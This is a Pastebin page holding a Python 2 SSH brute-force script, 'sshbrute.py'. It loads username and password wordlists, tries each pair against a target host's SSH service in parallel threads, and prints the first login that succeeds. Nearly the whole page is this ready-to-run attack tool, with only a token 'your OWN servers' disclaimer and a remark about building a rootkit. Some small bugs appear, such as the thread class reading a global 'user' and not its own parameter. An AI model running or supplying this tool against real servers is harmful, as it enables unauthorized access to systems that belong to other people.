Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #############################################################
- # _____ _ #
- # / ____| | | #
- # | | ___ _ __ ___ _ __ ___ __ _ _ __ __| |___ #
- # | | / _ \| |_ | _ \| |_ | _ \ / _| | |_ \ / _| / __| #
- # | |___| (_) | | | | | | | | | | | (_| | | | | (_| \__ \ #
- # \_____\___/|_| |_| |_|_| |_| |_|\__|_|_| |_|\____|___/ #
- # #
- #############################################################
- # Simply execute normally as a python file. :)
- # python sshbrute.py
- # A command menu will be given.
- # Please use the -v [verbose] so you will know what password/user it's bruteforcing with
- # Have fun bbruteforcing your OWN servers :)
- # Sincerely -Chris Poole | @codingplanets
- #########################################
- import sys, time
- from threading import Thread
- try:
- from paramiko import SSHClient
- from paramiko import AutoAddPolicy
- except ImportError:
- print '''
- You need paramiko module.
- Much love from Chris! <3 ^_^
- aptitude install python-paramiko
- apt-get install python-paramiko
- yum install python-paramiko\n'''
- sys.exit(1)
- def license():
- '''Print the usage license to this software, yeah, it's the same as above'''
- print '''
- If you're here you must love my work by now! ;3
- I'm still on the verge of creating the rootkit I've
- been pushing for! ^_^ I love everyone<3 you must love
- me also!
- '''
- class BruteForce(Thread):
- def __init__(self, username, password, target, port, timeout):
- super(BruteForce, self).__init__()
- self.__port = port
- self.target = target
- self.password = password
- self.user = user
- self.timeout = timeout
- self.status = 'unknown'
- def run(self):
- ssh = SSHClient()
- ssh.set_missing_host_key_policy(AutoAddPolicy())
- try:
- ssh.connect(self.target, port = self.__port, username = self.user, password = self.password, pkey=None, timeout = self.timeout, allow_agent=False, look_for_keys=False)
- self.status = 'ok'
- ssh.close()
- except Exception, e:
- self.status = 'error'
- pass
- def makelist(file):
- items = []
- try:
- fd = open(file, 'r')
- except IOError:
- print 'unable to read file \'%s\'' % file
- pass
- except Exception, e:
- print 'unknown error'
- pass
- for line in fd.readlines():
- item = line.replace('\n', '').replace('\r', '')
- items.append(item)
- return items
- if __name__ == '__main__':
- from optparse import OptionError
- from optparse import OptionParser
- version = '''The version is...
- 1337!!!! you should have knew that!'''
- usage = '%s [-H target] [-p port] [-U userslist] [-P wordlist] [-T threads] [-w timeout] [-v]' % sys.argv[0]
- print "Usage: %s -H 127.0.0.1 -p 22 -U user.txt -P list.txt -T 16 -w 30 -v" % sys.argv[0]
- print " "
- parser = OptionParser(version=version, usage=usage)
- parser.add_option('-H', dest='target', help='hostname/ip')
- parser.add_option('-p', type='int', dest='port', default=22, help='port (default:%default)')
- parser.add_option('-U', dest='userlist', help='userlist file')
- parser.add_option('-P', dest='passlist', help='passwordlist file')
- parser.add_option('-T', type='int', dest='threads', default=16, help='number of connections in parallel (%default threads)')
- parser.add_option('-w', type='int', dest='timeout', default=30, help='defines the max wait time in seconds for responses (%default secs)')
- parser.add_option('-v', '--verbose', action='store_true', dest='verbose', help='verbose')
- parser.add_option('-l', '--license', action='store_true', dest='license', help='license')
- (options, args) = parser.parse_args()
- if options.license:
- license()
- sys.exit(0)
- if not options.target or not options.userlist or not options.passlist:
- parser.print_help()
- sys.exit(1)
- target = options.target
- port = options.port
- users = options.userlist
- passwords = options.passlist
- threads = options.threads
- timeout = options.timeout
- results = []
- tcounter = 0
- userlist = makelist(users)
- passwordlist = makelist(passwords)
- print "[!] SSH-Brute | Created by Chris Poole [!]"
- print "[*] %s user(s) loaded." % str(len(userlist))
- print "[*] %s password(s) loaded." % str(len(passwordlist))
- print "[*] Brute Force started."
- for user in userlist:
- for password in passwordlist:
- current = BruteForce(user, password, target, port, timeout)
- results.append(current)
- current.start()
- tcounter += 1
- if options.verbose:
- print " [+] user: %s" % user + " password: %s\n" % password,
- if tcounter == threads:
- for result in results:
- result.join()
- if result.status == 'error':
- pass
- else:
- print "\n[*] Login successful!"
- print "[*] user: %s" % result.user
- print "[*] password: %s\n" % result.password
- sys.exit(0)
- tcounter = 0
- sys.exit(0)
Add Comment
Please, Sign In to add comment